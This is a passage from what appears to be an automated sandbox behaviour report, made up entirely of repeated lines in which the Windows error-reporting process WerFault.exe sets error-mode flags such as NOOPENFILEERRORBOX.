            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
